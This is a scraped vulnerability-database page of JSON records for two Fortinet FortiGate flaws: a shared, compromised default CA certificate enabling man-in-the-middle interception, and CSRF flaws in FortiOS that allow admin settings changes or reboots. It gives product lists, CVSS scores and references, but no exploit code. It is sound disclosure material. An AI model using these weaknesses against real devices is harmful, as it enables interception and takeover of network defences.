Show details on source website{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", "affected_products": { "@id": "https://www.variotdbs.pl/ref/affected_products" }, "configurations": { "@id": "https://www.variotdbs.pl/ref/configurations" }, "credits": { "@id": "https://www.variotdbs.pl/ref/credits" }, "cvss": { "@id": "https://www.variotdbs.pl/ref/cvss/" }, "description": { "@id": "https://www.variotdbs.pl/ref/description/" }, "exploit_availability": { "@id": "https://www.variotdbs.pl/ref/exploit_availability/" }, "external_ids": { "@id": "https://www.variotdbs.pl/ref/external_ids/" }, "iot": { "@id": "https://www.variotdbs.pl/ref/iot/" }, "iot_taxonomy": { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/" }, "patch": { "@id": "https://www.variotdbs.pl/ref/patch/" }, "problemtype_data": { "@id": "https://www.variotdbs.pl/ref/problemtype_data/" }, "references": { "@id": "https://www.variotdbs.pl/ref/references/" }, "sources": { "@id": "https://www.variotdbs.pl/ref/sources/" }, "sources_release_date": { "@id": "https://www.variotdbs.pl/ref/sources_release_date/" }, "sources_update_date": { "@id": "https://www.variotdbs.pl/ref/sources_update_date/" }, "threat_type": { "@id": "https://www.variotdbs.pl/ref/threat_type/" }, "title": { "@id": "https://www.variotdbs.pl/ref/title/" }, "type": { "@id": "https://www.variotdbs.pl/ref/type/" } }, "@id": "https://www.variotdbs.pl/vuln/VAR-201211-0266", "affected_products": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "model": "fortigate-310b", "scope": "eq", "trust": 1.6, "vendor": "fortinet", "version": null }, { "model": "fortigate-50b", "scope": "eq", "trust": 1.6, "vendor": "fortinet", "version": null }, { "model": "fortigate-200b", "scope": "eq", "trust": 1.6, "vendor": 
"fortinet", "version": null }, { "model": "fortigate-3140b", "scope": "eq", "trust": 1.6, "vendor": "fortinet", "version": null }, { "model": "fortigate-5140b", "scope": "eq", "trust": 1.6, "vendor": "fortinet", "version": null }, { "model": "fortigate-3950b", "scope": "eq", "trust": 1.6, "vendor": "fortinet", "version": null }, { "model": "fortigate-1000c", "scope": "eq", "trust": 1.6, "vendor": "fortinet", "version": null }, { "model": "fortigate-3040b", "scope": "eq", "trust": 1.6, "vendor": "fortinet", "version": null }, { "model": "fortigate-5020", "scope": "eq", "trust": 1.6, "vendor": "fortinet", "version": null }, { "model": "fortigate-5060", "scope": "eq", "trust": 1.6, "vendor": "fortinet", "version": null }, { "model": "fortigate-20c", "scope": "eq", "trust": 1.0, "vendor": "fortinet", "version": null }, { "model": "fortigate-3810a", "scope": "eq", "trust": 1.0, "vendor": "fortinet", "version": null }, { "model": "fortigate-5001a-sw", "scope": "eq", "trust": 1.0, "vendor": "fortinet", "version": null }, { "model": "fortigate-600c", "scope": "eq", "trust": 1.0, "vendor": "fortinet", "version": null }, { "model": "fortigate-5001b", "scope": "eq", "trust": 1.0, "vendor": "fortinet", "version": null }, { "model": "fortigate-80c", "scope": "eq", "trust": 1.0, "vendor": "fortinet", "version": null }, { "model": "fortigate-300c", "scope": "eq", "trust": 1.0, "vendor": "fortinet", "version": null }, { "model": "fortigate-60c", "scope": "eq", "trust": 1.0, "vendor": "fortinet", "version": null }, { "model": "fortigate-voice-80c", "scope": "eq", "trust": 1.0, "vendor": "fortinet", "version": null }, { "model": "fortigate-800c", "scope": "eq", "trust": 1.0, "vendor": "fortinet", "version": null }, { "model": "fortigate-110c", "scope": "eq", "trust": 1.0, "vendor": "fortinet", "version": null }, { "model": "fortigate-620b", "scope": "eq", "trust": 1.0, "vendor": "fortinet", "version": null }, { "model": "fortigate-40c", "scope": "eq", "trust": 1.0, "vendor": 
"fortinet", "version": null }, { "model": "fortigate-3240c", "scope": "eq", "trust": 1.0, "vendor": "fortinet", "version": null }, { "model": "fortigate-5101c", "scope": "eq", "trust": 1.0, "vendor": "fortinet", "version": null }, { "model": "fortigaterugged-100c", "scope": "eq", "trust": 1.0, "vendor": "fortinet", "version": null }, { "model": "fortigate-100d", "scope": "eq", "trust": 1.0, "vendor": "fortinet", "version": null }, { "model": "fortigate-1240b", "scope": "eq", "trust": 1.0, "vendor": "fortinet", "version": null }, { "model": "fortigate-311b", "scope": "eq", "trust": 1.0, "vendor": "fortinet", "version": null }, { "model": null, "scope": null, "trust": 0.8, "vendor": "fortinet", "version": null }, { "model": "fortigate", "scope": "eq", "trust": 0.8, "vendor": "fortinet", "version": "utm the appliance" }, { "model": "unified threat management", "scope": "eq", "trust": 0.3, "vendor": "fortinet", "version": "0" } ], "sources": [ { "db": "CERT/CC", "id": "VU#111708" }, { "db": "BID", "id": "56382" }, { "db": "JVNDB", "id": "JVNDB-2012-005202" }, { "db": "CNNVD", "id": "CNNVD-201211-077" }, { "db": "NVD", "id": "CVE-2012-4948" } ] }, "configurations": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/configurations#", "children": { "@container": "@list" }, "cpe_match": { "@container": "@list" }, "data": { "@container": "@list" }, "nodes": { "@container": "@list" } }, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "cpe_match": [ { "cpe22Uri": "cpe:/h:fortinet:fortigate", "vulnerable": true } ], "operator": "OR" } ] } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2012-005202" } ] }, "credits": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/credits#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Bitwiper", "sources": [ { "db": "BID", "id": "56382" }, { "db": "CNNVD", "id": "CNNVD-201211-077" } ], "trust": 0.9 }, "cve": "CVE-2012-4948", "cvss": { "@context": { "cvssV2": 
{ "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2" }, "cvssV3": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/" }, "severity": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#" }, "@id": "https://www.variotdbs.pl/ref/cvss/severity" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "cvssV2": [ { "accessComplexity": "HIGH", "accessVector": "ADJACENT_NETWORK", "authentication": "NONE", "author": "nvd@nist.gov", "availabilityImpact": "NONE", "baseScore": 5.3, "confidentialityImpact": "COMPLETE", "exploitabilityScore": 3.2, "id": "CVE-2012-4948", "impactScore": 7.8, "integrityImpact": "PARTIAL", "severity": "MEDIUM", "trust": 1.8, "vectorString": "AV:A/AC:H/Au:N/C:C/I:P/A:N", "version": "2.0" }, { "acInsufInfo": null, "accessComplexity": "HIGH", "accessVector": "ADJACENT NETWORK", "authentication": "NONE", "author": "NVD", "availabilityImpact": "NONE", "availabilityRequirement": "NOT DEFINED", "baseScore": 4.6, "collateralDamagePotential": "NOT DEFINED", "confidentialityImpact": "COMPLETE", "confidentialityRequirement": "NOT DEFINED", "enviromentalScore": 3.7, "exploitability": "FUNCTIONAL", "exploitabilityScore": 3.2, "id": "CVE-2012-4948", "impactScore": 6.9, "integrityImpact": "NONE", "integrityRequirement": "NOT DEFINED", "obtainAllPrivilege": null, "obtainOtherPrivilege": null, "obtainUserPrivilege": null, "remediationLevel": "WORKAROUND", "reportConfidence": "UNCOFIRMED", "severity": "MEDIUM", "targetDistribution": "NOT DEFINED", "trust": 0.8, "userInteractionRequired": null, "vector_string": "AV:A/AC:H/Au:N/C:C/I:N/A:N", "version": "2.0" }, { "accessComplexity": "HIGH", "accessVector": "ADJACENT_NETWORK", 
"authentication": "NONE", "author": "VULHUB", "availabilityImpact": "NONE", "baseScore": 5.3, "confidentialityImpact": "COMPLETE", "exploitabilityScore": 3.2, "id": "VHN-58229", "impactScore": 7.8, "integrityImpact": "PARTIAL", "severity": "MEDIUM", "trust": 0.1, "vectorString": "AV:A/AC:H/AU:N/C:C/I:P/A:N", "version": "2.0" } ], "cvssV3": [], "severity": [ { "author": "NVD", "id": "CVE-2012-4948", "trust": 1.6, "value": "MEDIUM" }, { "author": "nvd@nist.gov", "id": "CVE-2012-4948", "trust": 1.0, "value": "MEDIUM" }, { "author": "CNNVD", "id": "CNNVD-201211-077", "trust": 0.6, "value": "MEDIUM" }, { "author": "VULHUB", "id": "VHN-58229", "trust": 0.1, "value": "MEDIUM" } ] } ], "sources": [ { "db": "CERT/CC", "id": "VU#111708" }, { "db": "VULHUB", "id": "VHN-58229" }, { "db": "JVNDB", "id": "JVNDB-2012-005202" }, { "db": "CNNVD", "id": "CNNVD-201211-077" }, { "db": "NVD", "id": "CVE-2012-4948" } ] }, "description": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "The default configuration of Fortinet Fortigate UTM appliances uses the same Certification Authority certificate and same private key across different customers\u0027 installations, which makes it easier for man-in-the-middle attackers to spoof SSL servers by leveraging the presence of the Fortinet_CA_SSLProxy certificate in a list of trusted root certification authorities. The private key, which has been compromised, allows attackers to create and sign fake certificates. FortiGate of UTM The appliance includes CA There is a problem with the handling of the certificate. FortiGate of UTM The appliance is common by default CA It uses a certificate and its private key is publicly available on the web. 
Therefore, this CA All devices that use certificates may be affected by this vulnerability.Man-in-the-middle attacks by third parties (man-in-the-middle attack) May be eavesdropped on, or malware may be installed. Fortigate UTM appliances is prone to a security-bypass vulnerability. \nSuccessfully exploiting this issue allows attackers to perform man-in-the-middle attacks and gain access to sensitive information; other attacks are also possible. Fortinet FortiGate is a network security platform developed by Fortinet. The platform provides functions such as firewall, antivirus and intrusion prevention (IPS), application control, antispam, wireless controller and WAN acceleration", "sources": [ { "db": "NVD", "id": "CVE-2012-4948" }, { "db": "CERT/CC", "id": "VU#111708" }, { "db": "JVNDB", "id": "JVNDB-2012-005202" }, { "db": "BID", "id": "56382" }, { "db": "VULHUB", "id": "VHN-58229" } ], "trust": 2.7 }, "exploit_availability": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/exploit_availability#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "reference": "https://www.kb.cert.org/vuls/id/111708", "trust": 0.8, "type": "unknown" } ], "sources": [ { "db": "CERT/CC", "id": "VU#111708" } ] }, "external_ids": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "db": "NVD", "id": "CVE-2012-4948", "trust": 3.6 }, { "db": "CERT/CC", "id": "VU#111708", "trust": 3.3 }, { "db": "BID", "id": "56382", "trust": 2.0 }, { "db": "OSVDB", "id": "87048", "trust": 1.1 }, { "db": "JVNDB", "id": "JVNDB-2012-005202", "trust": 0.8 }, { "db": "CNNVD", "id": "CNNVD-201211-077", "trust": 0.7 }, { "db": "VULHUB", "id": "VHN-58229", "trust": 0.1 } ], "sources": [ { "db": "CERT/CC", "id": "VU#111708" }, { 
"db": "VULHUB", "id": "VHN-58229" }, { "db": "BID", "id": "56382" }, { "db": "JVNDB", "id": "JVNDB-2012-005202" }, { "db": "CNNVD", "id": "CNNVD-201211-077" }, { "db": "NVD", "id": "CVE-2012-4948" } ] }, "id": "VAR-201211-0266", "iot": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": true, "sources": [ { "db": "VULHUB", "id": "VHN-58229" } ], "trust": 0.01 }, "last_update_date": "2024-11-23T23:02:53.069000Z", "patch": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "title": "Unified Threat Management (UTM)", "trust": 0.8, "url": "http://www.fortinet.com/solutions/unified_threat_management.html" } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2012-005202" } ] }, "problemtype_data": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "problemtype": "CWE-295", "trust": 1.1 }, { "problemtype": "CWE-16", "trust": 0.8 } ], "sources": [ { "db": "VULHUB", "id": "VHN-58229" }, { "db": "JVNDB", "id": "JVNDB-2012-005202" }, { "db": "NVD", "id": "CVE-2012-4948" } ] }, "references": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "trust": 2.5, "url": "http://www.kb.cert.org/vuls/id/111708" }, { "trust": 1.7, "url": "http://www.securityfocus.com/bid/56382" }, { "trust": 1.1, "url": "http://osvdb.org/87048" }, { "trust": 0.8, "url": "http://docs.fortinet.com/fos40hlp/43/wwhelp/wwhimpl/common/html/wwhelp.htm?context=fgt\u0026file=misc_utm_chapter.61.13.html" }, { "trust": 
0.8, "url": "http://kb.fortinet.com/kb/viewcontent.do?externalid=fd32404" }, { "trust": 0.8, "url": "http://www.fortinet.com/solutions/unified_threat_management.html" }, { "trust": 0.8, "url": "https://media.torproject.org/misc/2012-07-03-cyberoam-cve-2012-3372.txt" }, { "trust": 0.8, "url": "http://docs.fortinet.com/fos40hlp/43/wwhelp/wwhimpl/js/html/wwhelp.htm" }, { "trust": 0.8, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2012-4948" }, { "trust": 0.8, "url": "http://jvn.jp/cert/jvnvu111708" }, { "trust": 0.8, "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2012-4948" } ], "sources": [ { "db": "CERT/CC", "id": "VU#111708" }, { "db": "VULHUB", "id": "VHN-58229" }, { "db": "JVNDB", "id": "JVNDB-2012-005202" }, { "db": "CNNVD", "id": "CNNVD-201211-077" }, { "db": "NVD", "id": "CVE-2012-4948" } ] }, "sources": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", "data": { "@container": "@list" } }, "data": [ { "db": "CERT/CC", "id": "VU#111708" }, { "db": "VULHUB", "id": "VHN-58229" }, { "db": "BID", "id": "56382" }, { "db": "JVNDB", "id": "JVNDB-2012-005202" }, { "db": "CNNVD", "id": "CNNVD-201211-077" }, { "db": "NVD", "id": "CVE-2012-4948" } ] }, "sources_release_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2012-11-02T00:00:00", "db": "CERT/CC", "id": "VU#111708" }, { "date": "2012-11-14T00:00:00", "db": "VULHUB", "id": "VHN-58229" }, { "date": "2012-11-02T00:00:00", "db": "BID", "id": "56382" }, { "date": "2012-11-06T00:00:00", "db": "JVNDB", "id": "JVNDB-2012-005202" }, { "date": "2012-11-06T00:00:00", "db": "CNNVD", "id": "CNNVD-201211-077" }, { "date": "2012-11-14T12:30:59.507000", "db": "NVD", "id": "CVE-2012-4948" } ] }, "sources_update_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2012-11-02T00:00:00", "db": "CERT/CC", 
"id": "VU#111708" }, { "date": "2016-12-07T00:00:00", "db": "VULHUB", "id": "VHN-58229" }, { "date": "2012-11-02T00:00:00", "db": "BID", "id": "56382" }, { "date": "2012-11-16T00:00:00", "db": "JVNDB", "id": "JVNDB-2012-005202" }, { "date": "2012-11-15T00:00:00", "db": "CNNVD", "id": "CNNVD-201211-077" }, { "date": "2024-11-21T01:43:48.363000", "db": "NVD", "id": "CVE-2012-4948" } ] }, "threat_type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "specific network environment", "sources": [ { "db": "CNNVD", "id": "CNNVD-201211-077" } ], "trust": 0.6 }, "title": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Fortigate UTM appliances share the same default CA certificate", "sources": [ { "db": "CERT/CC", "id": "VU#111708" } ], "trust": 0.8 }, "type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "configuration error", "sources": [ { "db": "CNNVD", "id": "CNNVD-201211-077" } ], "trust": 0.6 } }
Vulnerability from fkie_nvd
{ "configurations": [ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:fortinet:fortios:*:*:*:*:*:*:*:*", "matchCriteriaId": "F4A9AD38-4005-4B33-AB47-5E81F9AB5E32", "versionEndIncluding": "4.3.12", "vulnerable": true }, { "criteria": "cpe:2.3:o:fortinet:fortios:4.3.10:*:*:*:*:*:*:*", "matchCriteriaId": "B75D8F35-830C-498C-B658-AE89154BEB8C", "vulnerable": true }, { "criteria": "cpe:2.3:o:fortinet:fortios:5.0:*:*:*:*:*:*:*", "matchCriteriaId": "51B177A0-244F-4A76-8425-F75C1DA3CC1B", "vulnerable": true }, { "criteria": "cpe:2.3:o:fortinet:fortios:5.0.1:*:*:*:*:*:*:*", "matchCriteriaId": "0D8A5EC4-CE2C-4174-9F09-361B8D153AD9", "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:fortinet:fortigate-1000c:-:*:*:*:*:*:*:*", "matchCriteriaId": "E7EF5E98-4A7F-486E-A666-5CB2D6AE4B6F", "vulnerable": true }, { "criteria": "cpe:2.3:h:fortinet:fortigate-100d:-:*:*:*:*:*:*:*", "matchCriteriaId": "0D62FF7B-F07B-4B1A-BE3C-3269BB517B64", "vulnerable": true }, { "criteria": "cpe:2.3:h:fortinet:fortigate-110c:-:*:*:*:*:*:*:*", "matchCriteriaId": "9D25F582-60D5-4B99-BF5D-DF0F075AE824", "vulnerable": true }, { "criteria": "cpe:2.3:h:fortinet:fortigate-1240b:-:*:*:*:*:*:*:*", "matchCriteriaId": "8C1D6711-1D64-4BD3-9580-C332A52C169E", "vulnerable": true }, { "criteria": "cpe:2.3:h:fortinet:fortigate-200b:-:*:*:*:*:*:*:*", "matchCriteriaId": "09756E3C-7C02-4482-B2ED-2646CA127A7E", "vulnerable": true }, { "criteria": "cpe:2.3:h:fortinet:fortigate-20c:-:*:*:*:*:*:*:*", "matchCriteriaId": "F864DACE-F574-47D3-9E6D-8E463DCC1CB7", "vulnerable": true }, { "criteria": "cpe:2.3:h:fortinet:fortigate-300c:-:*:*:*:*:*:*:*", "matchCriteriaId": "18E0C2D6-A8B3-4CF0-86CD-45CEA5D9E4E5", "vulnerable": true }, { "criteria": "cpe:2.3:h:fortinet:fortigate-3040b:-:*:*:*:*:*:*:*", "matchCriteriaId": "42813ADB-E285-4FF0-946C-3A09833D9520", "vulnerable": true }, { "criteria": "cpe:2.3:h:fortinet:fortigate-310b:-:*:*:*:*:*:*:*", "matchCriteriaId": 
"0B75EAF6-3E8C-40CC-92D1-6069123182AC", "vulnerable": true }, { "criteria": "cpe:2.3:h:fortinet:fortigate-311b:-:*:*:*:*:*:*:*", "matchCriteriaId": "0BB1DA95-78AD-442D-8251-3ACF49CA2329", "vulnerable": true }, { "criteria": "cpe:2.3:h:fortinet:fortigate-3140b:-:*:*:*:*:*:*:*", "matchCriteriaId": "5014850E-FE19-40E8-8FA9-0FC152167B58", "vulnerable": true }, { "criteria": "cpe:2.3:h:fortinet:fortigate-3240c:-:*:*:*:*:*:*:*", "matchCriteriaId": "89280DF2-D8C0-4FDE-A79A-92687445CB20", "vulnerable": true }, { "criteria": "cpe:2.3:h:fortinet:fortigate-3810a:-:*:*:*:*:*:*:*", "matchCriteriaId": "6CB41136-3EBB-45B5-A885-69EE822E9C5B", "vulnerable": true }, { "criteria": "cpe:2.3:h:fortinet:fortigate-3950b:-:*:*:*:*:*:*:*", "matchCriteriaId": "FB3B88B6-3B10-4CE8-A854-9621E0FB1B30", "vulnerable": true }, { "criteria": "cpe:2.3:h:fortinet:fortigate-40c:-:*:*:*:*:*:*:*", "matchCriteriaId": "5534A2C1-C352-49BD-B639-404FE61660E0", "vulnerable": true }, { "criteria": "cpe:2.3:h:fortinet:fortigate-5001a-sw:-:*:*:*:*:*:*:*", "matchCriteriaId": "615D7EB5-CA3B-430D-A1CB-8F7F17BCF403", "vulnerable": true }, { "criteria": "cpe:2.3:h:fortinet:fortigate-5001b:-:*:*:*:*:*:*:*", "matchCriteriaId": "766FAC92-8E75-4347-9A76-DB372DA28715", "vulnerable": true }, { "criteria": "cpe:2.3:h:fortinet:fortigate-5020:-:*:*:*:*:*:*:*", "matchCriteriaId": "F9320594-0B6C-44DB-9C58-7FCBBDDC3F3F", "vulnerable": true }, { "criteria": "cpe:2.3:h:fortinet:fortigate-5060:-:*:*:*:*:*:*:*", "matchCriteriaId": "9BD39F61-3779-44BE-B71D-0E587072D8CC", "vulnerable": true }, { "criteria": "cpe:2.3:h:fortinet:fortigate-50b:-:*:*:*:*:*:*:*", "matchCriteriaId": "CE424B2A-3299-496F-9778-04D0792BC0D5", "vulnerable": true }, { "criteria": "cpe:2.3:h:fortinet:fortigate-5101c:-:*:*:*:*:*:*:*", "matchCriteriaId": "59C78680-88A9-4AB0-9FE9-333690A9B66A", "vulnerable": true }, { "criteria": "cpe:2.3:h:fortinet:fortigate-5140b:-:*:*:*:*:*:*:*", "matchCriteriaId": "7AA3538A-5B71-4939-8A2A-93678E6EB1D3", "vulnerable": true }, { 
"criteria": "cpe:2.3:h:fortinet:fortigate-600c:-:*:*:*:*:*:*:*", "matchCriteriaId": "7A73FA2A-1852-4AE0-A892-9B0B06705324", "vulnerable": true }, { "criteria": "cpe:2.3:h:fortinet:fortigate-60c:-:*:*:*:*:*:*:*", "matchCriteriaId": "1F72F3FE-DC85-4605-B416-4FE31F90A06A", "vulnerable": true }, { "criteria": "cpe:2.3:h:fortinet:fortigate-620b:-:*:*:*:*:*:*:*", "matchCriteriaId": "9D4BC042-D692-477E-A790-7BECF4B210A6", "vulnerable": true }, { "criteria": "cpe:2.3:h:fortinet:fortigate-800c:-:*:*:*:*:*:*:*", "matchCriteriaId": "6EB09BD9-6853-40D6-BDA7-749D87335E4F", "vulnerable": true }, { "criteria": "cpe:2.3:h:fortinet:fortigate-80c:-:*:*:*:*:*:*:*", "matchCriteriaId": "113E1146-572A-466A-AB34-145081F842B4", "vulnerable": true }, { "criteria": "cpe:2.3:h:fortinet:fortigate-voice-80c:-:*:*:*:*:*:*:*", "matchCriteriaId": "BF418899-1667-4428-B8E8-E4E29D634DDC", "vulnerable": true }, { "criteria": "cpe:2.3:h:fortinet:fortigaterugged-100c:-:*:*:*:*:*:*:*", "matchCriteriaId": "9C24DF92-D24B-43D1-8623-17F3F90F29D0", "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": "AND" } ], "cveTags": [], "descriptions": [ { "lang": "en", "value": "Multiple cross-site request forgery (CSRF) vulnerabilities in Fortinet FortiOS on FortiGate firewall devices before 4.3.13 and 5.x before 5.0.2 allow remote attackers to hijack the authentication of administrators for requests that modify (1) settings or (2) policies, or (3) restart the device via a rebootme action to system/maintenance/shutdown." 
}, { "lang": "es", "value": "M\u00faltiples vulnerabilidades de falsificaci\u00f3n de peticiones en sitios cruzados (CSRF) en Fortinet FortiOS en el dispositivo firewall FortiGate anteriores a v4.3.13 y v5.x anteriores a v5.0.2 permite a atacantes remotos secuestrar la autenticaci\u00f3n de administradores para peticiones que modifican (1) configuraci\u00f3n (2) pol\u00edticas o (3) reinicio de dispositivos a trav\u00e9s de una acci\u00f3n reinicio sobre system/maintenance/shutdown." } ], "id": "CVE-2013-1414", "lastModified": "2024-11-21T01:49:32.010", "metrics": { "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "HIGH", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5.1, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:H/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 4.9, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ] }, "published": "2013-07-08T17:55:02.783", "references": [ { "source": "cve@mitre.org", "tags": [ "Exploit" ], "url": "http://www.exploit-db.com/exploits/26528/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit" ], "url": "http://www.exploit-db.com/exploits/26528/" } ], "sourceIdentifier": "cve@mitre.org", "vulnStatus": "Modified", "weaknesses": [ { "description": [ { "lang": "en", "value": "CWE-352" } ], "source": "nvd@nist.gov", "type": "Primary" } ] }
Vulnerability from fkie_nvd
Source | URL | Tags
---|---|---
cret@cert.org | http://osvdb.org/87048 |
cret@cert.org | http://www.kb.cert.org/vuls/id/111708 | Third Party Advisory, US Government Resource
cret@cert.org | http://www.securityfocus.com/bid/56382 | Third Party Advisory, VDB Entry
af854a3a-2127-422b-91ae-364da2661108 | http://osvdb.org/87048 |
af854a3a-2127-422b-91ae-364da2661108 | http://www.kb.cert.org/vuls/id/111708 | Third Party Advisory, US Government Resource
af854a3a-2127-422b-91ae-364da2661108 | http://www.securityfocus.com/bid/56382 | Third Party Advisory, VDB Entry
{ "configurations": [ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:h:fortinet:fortigate-1000c:-:*:*:*:*:*:*:*", "matchCriteriaId": "E7EF5E98-4A7F-486E-A666-5CB2D6AE4B6F", "vulnerable": true }, { "criteria": "cpe:2.3:h:fortinet:fortigate-100d:-:*:*:*:*:*:*:*", "matchCriteriaId": "0D62FF7B-F07B-4B1A-BE3C-3269BB517B64", "vulnerable": true }, { "criteria": "cpe:2.3:h:fortinet:fortigate-110c:-:*:*:*:*:*:*:*", "matchCriteriaId": "9D25F582-60D5-4B99-BF5D-DF0F075AE824", "vulnerable": true }, { "criteria": "cpe:2.3:h:fortinet:fortigate-1240b:-:*:*:*:*:*:*:*", "matchCriteriaId": "8C1D6711-1D64-4BD3-9580-C332A52C169E", "vulnerable": true }, { "criteria": "cpe:2.3:h:fortinet:fortigate-200b:-:*:*:*:*:*:*:*", "matchCriteriaId": "09756E3C-7C02-4482-B2ED-2646CA127A7E", "vulnerable": true }, { "criteria": "cpe:2.3:h:fortinet:fortigate-20c:-:*:*:*:*:*:*:*", "matchCriteriaId": "F864DACE-F574-47D3-9E6D-8E463DCC1CB7", "vulnerable": true }, { "criteria": "cpe:2.3:h:fortinet:fortigate-300c:-:*:*:*:*:*:*:*", "matchCriteriaId": "18E0C2D6-A8B3-4CF0-86CD-45CEA5D9E4E5", "vulnerable": true }, { "criteria": "cpe:2.3:h:fortinet:fortigate-3040b:-:*:*:*:*:*:*:*", "matchCriteriaId": "42813ADB-E285-4FF0-946C-3A09833D9520", "vulnerable": true }, { "criteria": "cpe:2.3:h:fortinet:fortigate-310b:-:*:*:*:*:*:*:*", "matchCriteriaId": "0B75EAF6-3E8C-40CC-92D1-6069123182AC", "vulnerable": true }, { "criteria": "cpe:2.3:h:fortinet:fortigate-311b:-:*:*:*:*:*:*:*", "matchCriteriaId": "0BB1DA95-78AD-442D-8251-3ACF49CA2329", "vulnerable": true }, { "criteria": "cpe:2.3:h:fortinet:fortigate-3140b:-:*:*:*:*:*:*:*", "matchCriteriaId": "5014850E-FE19-40E8-8FA9-0FC152167B58", "vulnerable": true }, { "criteria": "cpe:2.3:h:fortinet:fortigate-3240c:-:*:*:*:*:*:*:*", "matchCriteriaId": "89280DF2-D8C0-4FDE-A79A-92687445CB20", "vulnerable": true }, { "criteria": "cpe:2.3:h:fortinet:fortigate-3810a:-:*:*:*:*:*:*:*", "matchCriteriaId": "6CB41136-3EBB-45B5-A885-69EE822E9C5B", "vulnerable": true }, { "criteria": 
"cpe:2.3:h:fortinet:fortigate-3950b:-:*:*:*:*:*:*:*", "matchCriteriaId": "FB3B88B6-3B10-4CE8-A854-9621E0FB1B30", "vulnerable": true }, { "criteria": "cpe:2.3:h:fortinet:fortigate-40c:-:*:*:*:*:*:*:*", "matchCriteriaId": "5534A2C1-C352-49BD-B639-404FE61660E0", "vulnerable": true }, { "criteria": "cpe:2.3:h:fortinet:fortigate-5001a-sw:-:*:*:*:*:*:*:*", "matchCriteriaId": "615D7EB5-CA3B-430D-A1CB-8F7F17BCF403", "vulnerable": true }, { "criteria": "cpe:2.3:h:fortinet:fortigate-5001b:-:*:*:*:*:*:*:*", "matchCriteriaId": "766FAC92-8E75-4347-9A76-DB372DA28715", "vulnerable": true }, { "criteria": "cpe:2.3:h:fortinet:fortigate-5020:-:*:*:*:*:*:*:*", "matchCriteriaId": "F9320594-0B6C-44DB-9C58-7FCBBDDC3F3F", "vulnerable": true }, { "criteria": "cpe:2.3:h:fortinet:fortigate-5060:-:*:*:*:*:*:*:*", "matchCriteriaId": "9BD39F61-3779-44BE-B71D-0E587072D8CC", "vulnerable": true }, { "criteria": "cpe:2.3:h:fortinet:fortigate-50b:-:*:*:*:*:*:*:*", "matchCriteriaId": 